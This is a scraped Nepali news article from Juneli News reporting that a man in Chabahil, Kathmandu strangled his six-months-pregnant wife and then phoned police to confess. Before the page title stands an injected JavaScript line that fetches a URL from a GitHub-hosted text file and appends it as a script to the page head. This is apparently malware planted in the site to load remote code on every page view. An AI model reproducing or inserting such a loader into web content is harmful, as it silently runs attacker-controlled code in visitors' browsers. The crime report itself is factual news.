;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); काठमाण्डौमा श्रीमानद्वारा गभर्वती रहेकी श्रीमतीको हत्या – जुनेली न्युज
बिहिबार, बैशाख ५, २०८२
  • होमपेज
  • काठमाण्डौमा श्रीमानद्वारा गभर्वती रहेकी श्रीमतीको हत्या
Breaking News

काठमाण्डौमा श्रीमानद्वारा गभर्वती रहेकी श्रीमतीको हत्या

जुनेली न्यूज, काठमाडौं । मकवानपुरको हेटौंडा घर भई काठमाडौंको चाबहिल बस्दै आएका ३९ वर्षका राम श्रेष्ठले २३ वर्षकी श्रीमती रञ्जना तामाङको घाँटी थिचेर हत्या गरेका छन् |

 

श्रीमती ६ महिनाकी गर्भवती रहेको महानगरीय प्रहरी वृत्त गौशालाले जनाएको छ ।

श्रीमतीको हत्यापछि उनी आफैंले प्रहरीको हटलाइन १०० नम्बरमा फोन गरेर आफूले श्रीमतीको हत्या गरेको जानकारी दिएका थिए ।

उनले फोन गरेपछि प्रहरी टोली पुग्दा कोठाभित्र चुकुल लगाएर बसेको अवस्थामा अभियुक्त र ओछ्यानमा रन्जनाको शव भेटिएको थियो ।

श्रीमतीसँग बिवाद हुँदा आफूले घाँटी थिचेर हत्या गरेको भनेर श्रेष्ठले स्वीकारेको प्रहरीले जनाएको छ ।

गौशाला प्रहरीका डिएसपी केशव भट्टराईले घटनाको पुष्टि गर्दै अनुसन्धान भइरहेको बताए |

 

फेसबुक प्रतिक्रियाहरु